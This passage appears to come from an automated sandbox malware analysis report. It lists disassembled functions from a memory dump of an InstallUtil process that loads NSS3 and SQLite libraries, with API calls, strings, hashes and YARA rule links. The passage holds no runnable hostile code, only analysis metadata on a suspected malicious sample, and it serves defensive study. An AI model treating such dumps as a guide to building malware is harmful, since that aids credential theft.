                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C79ED95
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C79ED9D
                                                                                                                    • Part of subcall function 6C7B64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7B127C,00000000,00000000,00000000), ref: 6C7B650E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3323615905-3315324353
                                                                                                                  • Opcode ID: 3629cedafe0437a9cad001248ef9a9b2419179e5a5e8f6f958992058986b8f1f
                                                                                                                  • Instruction ID: 921e03b29c28ea457efb766e01181e2afc945d89bd9eb9ba148a44abc3c8f14e
                                                                                                                  • Opcode Fuzzy Hash: 3629cedafe0437a9cad001248ef9a9b2419179e5a5e8f6f958992058986b8f1f
                                                                                                                  • Instruction Fuzzy Hash: 77112B7690060867E6205A65BF8DBBB7278BF0260CF050934E81572F51FB35A70CD6D6
                                                                                                                  Function 6C860EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_LogPrint.NSS3(Aborting,?,6C742357), ref: 6C860EB8
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C742357), ref: 6C860EC0
                                                                                                                  • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C860EE6
                                                                                                                    • Part of subcall function 6C8609D0: PR_Now.NSS3 ref: 6C860A22
                                                                                                                    • Part of subcall function 6C8609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C860A35
                                                                                                                    • Part of subcall function 6C8609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C860A66
                                                                                                                    • Part of subcall function 6C8609D0: PR_GetCurrentThread.NSS3 ref: 6C860A70
                                                                                                                    • Part of subcall function 6C8609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C860A9D
                                                                                                                    • Part of subcall function 6C8609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C860AC8
                                                                                                                    • Part of subcall function 6C8609D0: PR_vsmprintf.NSS3(?,?), ref: 6C860AE8
                                                                                                                    • Part of subcall function 6C8609D0: EnterCriticalSection.KERNEL32(?), ref: 6C860B19
                                                                                                                    • Part of subcall function 6C8609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C860B48
                                                                                                                    • Part of subcall function 6C8609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C860C76
                                                                                                                    • Part of subcall function 6C8609D0: PR_LogFlush.NSS3 ref: 6C860C7E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C860EFA
                                                                                                                    • Part of subcall function 6C74AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C74AF0E
                                                                                                                  • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F16
                                                                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F1C
                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F25
                                                                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C860F2B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                  • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                  • API String ID: 3905088656-1374795319
                                                                                                                  • Opcode ID: 0ea5e142a80f1d58383776134ef304111b30ad396db941266b7a59994fbfaa1c
                                                                                                                  • Instruction ID: a99df995426ee61271b2378a8e18b7ccb04cce7d59d7a4d3bdfe32cf099fb503
                                                                                                                  • Opcode Fuzzy Hash: 0ea5e142a80f1d58383776134ef304111b30ad396db941266b7a59994fbfaa1c
                                                                                                                  • Instruction Fuzzy Hash: AAF0AFB59001187BEB203BA5AC4AC9F3E2DDF82269F004834FD0956A03DB36E914D6F6
                                                                                                                  Function 6C7C4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PORT_NewArena_Util.NSS3(00000400), ref: 6C7C4DCB
                                                                                                                    • Part of subcall function 6C7B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7587ED,00000800,6C74EF74,00000000), ref: 6C7B1000
                                                                                                                    • Part of subcall function 6C7B0FF0: PR_NewLock.NSS3(?,00000800,6C74EF74,00000000), ref: 6C7B1016
                                                                                                                    • Part of subcall function 6C7B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7587ED,00000008,?,00000800,6C74EF74,00000000), ref: 6C7B102B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C7C4DE1
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C7C4DFF
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7C4E59
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C88300C,00000000), ref: 6C7C4EB8
                                                                                                                  • SECOID_FindOID_Util.NSS3(?), ref: 6C7C4EFF
                                                                                                                  • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C7C4F56
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C7C521A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1025791883-0
                                                                                                                  • Opcode ID: 6003689a2d3889306dc834e08d24bfb1328f0fe7070a83dbf29e795ef5d5ab29
                                                                                                                  • Instruction ID: 8271ae4fe7edb0f86856d87baf8ac31d7607f1893480601fa613cf45cb3a5420
                                                                                                                  • Opcode Fuzzy Hash: 6003689a2d3889306dc834e08d24bfb1328f0fe7070a83dbf29e795ef5d5ab29
                                                                                                                  • Instruction Fuzzy Hash: D7F18C71F0020A8FDB04CF54E9447AEB7B2BF44358F258129E915AB781E776E981CB92
                                                                                                                  Function 6C754FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_NewLock.NSS3(00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C75502A
                                                                                                                  • PR_NewLock.NSS3(00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C755034
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,6C7AFD30,6C7FC350,00000000,00000000,00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C755055
                                                                                                                  • PL_NewHashTable.NSS3(00000000,6C7AFE80,6C7AFD30,6C7FC350,00000000,00000000,?,00000001,00000000,6C8A0148,?,6C766FEC), ref: 6C75506D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HashLockTable
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3862423791-0
                                                                                                                  • Opcode ID: 95074a9c5ab00e64810a02fbaee8389413fed2b9c724e369759e2dec69f4a2b7
                                                                                                                  • Instruction ID: 9b5cb1fea06fa76f12b728bef2e82a5a434532ce854fc8a9ae0c7e93eb67b94c
                                                                                                                  • Opcode Fuzzy Hash: 95074a9c5ab00e64810a02fbaee8389413fed2b9c724e369759e2dec69f4a2b7
                                                                                                                  • Instruction Fuzzy Hash: 8831F5B1B052209BDF208A659A4CB4B3BBCFB1336CF414535E90D93640EB79A415CBE5
                                                                                                                  Function 6C6F2E50 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 282COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F2F3D
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C6F2FB9
                                                                                                                  • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C6F3005
                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C6F30EE
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6F3131
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6F3178
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memsetsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 984749767-598938438
                                                                                                                  • Opcode ID: 449d327540db05946f480b7fb73983ddcb27ca3188f0ec20e000dd797afabea1
                                                                                                                  • Instruction ID: e0088432a0deac72b63c3e0b934e34561f06952f3f2e24db84564470e9616feb
                                                                                                                  • Opcode Fuzzy Hash: 449d327540db05946f480b7fb73983ddcb27ca3188f0ec20e000dd797afabea1
                                                                                                                  • Instruction Fuzzy Hash: DAB1E1B0E052199BCB18CF9DC885AFEB7B2BF49304F14442AE815B7B41D3749942CBA9
                                                                                                                  Function 6C6D2400 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 125COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(00000015,bind on a busy prepared statement: [%s],?), ref: 6C6D24EC
                                                                                                                  • sqlite3_log.NSS3(00000015,API called with NULL prepared statement,?,?,?,?,?,6C6D2315), ref: 6C6D254F
                                                                                                                  • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000151C9,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,6C6D2315), ref: 6C6D256C
                                                                                                                  Strings
                                                                                                                  • API called with finalized prepared statement, xrefs: 6C6D2543, 6C6D254D
                                                                                                                  • bind on a busy prepared statement: [%s], xrefs: 6C6D24E6
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6D24F4, 6C6D2557
                                                                                                                  • API called with NULL prepared statement, xrefs: 6C6D253C
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6D2566
                                                                                                                  • misuse, xrefs: 6C6D2561
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$misuse
                                                                                                                  • API String ID: 632333372-2222229625
                                                                                                                  • Opcode ID: 04065a766cf207fcdb72a1b276f2a489cde16aaa195391d31063cd450b69fadc
                                                                                                                  • Instruction ID: dd2f39f3f8d65eab8905563767501c52befdafb9a7b7622b3ac886c3e09302f7
                                                                                                                  • Opcode Fuzzy Hash: 04065a766cf207fcdb72a1b276f2a489cde16aaa195391d31063cd450b69fadc
                                                                                                                  • Instruction Fuzzy Hash: 0D41F3717006008BE7248F19E9A8BA673B6BF8631AF16493CE8054BB40DB36FC15C799
                                                                                                                  Function 6C7AA470 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 120memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C7AA4A6
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • PORT_Alloc_Util.NSS3(?), ref: 6C7AA4EC
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C7AA527
                                                                                                                  • memcmp.VCRUNTIME140(00000006,?,?), ref: 6C7AA56D
                                                                                                                  • memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C7AA583
                                                                                                                  • PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C7AA596
                                                                                                                  • free.MOZGLUE(?), ref: 6C7AA5A4
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7AA5B6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
                                                                                                                  • String ID: ^jvl
                                                                                                                  • API String ID: 3906949479-1924602488
                                                                                                                  • Opcode ID: 9d812c2b89c4e43a05eab37e1e686be5ba3e20fcf49ed37ad8214fc888441924
                                                                                                                  • Instruction ID: 8c526d3283d4789c70af79c02f65ed4ab6ef2eedc4ef9f10fc815185eff04aa3
                                                                                                                  • Opcode Fuzzy Hash: 9d812c2b89c4e43a05eab37e1e686be5ba3e20fcf49ed37ad8214fc888441924
                                                                                                                  • Instruction Fuzzy Hash: 5F412A71A013429FDB10CFD9CD44B9ABBB1BF40318F18C568D8695BB42E731E91ACBA1
                                                                                                                  Function 6C750F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C750F62
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C750F84
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,6C76F59B,6C87890C,?), ref: 6C750FA8
                                                                                                                  • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C750FC1
                                                                                                                    • Part of subcall function 6C7B0BE0: malloc.MOZGLUE(6C7A8D2D,?,00000000,?), ref: 6C7B0BF8
                                                                                                                    • Part of subcall function 6C7B0BE0: TlsGetValue.KERNEL32(6C7A8D2D,?,00000000,?), ref: 6C7B0C15
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C750FDB
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C750FEF
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C751001
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C751009
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 2061345354-3315324353
                                                                                                                  • Opcode ID: d9a1a14095f7a4e79844136a7e2e2d747fefa639622bf73c6ffc6e12e6a9b640
                                                                                                                  • Instruction ID: 2ec566b6a9b93738702b4628df73022274967d820d99d8c28173bd5e645a2fd3
                                                                                                                  • Opcode Fuzzy Hash: d9a1a14095f7a4e79844136a7e2e2d747fefa639622bf73c6ffc6e12e6a9b640
                                                                                                                  • Instruction Fuzzy Hash: 2A2128B1904204ABE7109F25DE44AAFB7B4EF4525CF048928FC18A7701FB31E659CBE2
                                                                                                                  Function 6C756DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,6C757D8F,6C757D8F,?,?), ref: 6C756DC8
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C7AFE08
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C7AFE1D
                                                                                                                    • Part of subcall function 6C7AFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C7AFE62
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C757D8F,?,?), ref: 6C756DD5
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FA0,00000000,?,?,?,?,6C757D8F,?,?), ref: 6C756DF7
                                                                                                                    • Part of subcall function 6C7AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8818D0,?), ref: 6C7AB095
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C756E35
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C7AFE29
                                                                                                                    • Part of subcall function 6C7AFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C7AFE3D
                                                                                                                    • Part of subcall function 6C7AFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C7AFE6F
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C756E4C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B116E
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FE0,00000000), ref: 6C756E82
                                                                                                                    • Part of subcall function 6C756AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C75B21D,00000000,00000000,6C75B219,?,6C756BFB,00000000,?,00000000,00000000,?,?,?,6C75B21D), ref: 6C756B01
                                                                                                                    • Part of subcall function 6C756AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C756B8A
                                                                                                                  • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C756F1E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C756F35
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C878FE0,00000000), ref: 6C756F6B
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000,6C757D8F,?,?), ref: 6C756FE1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
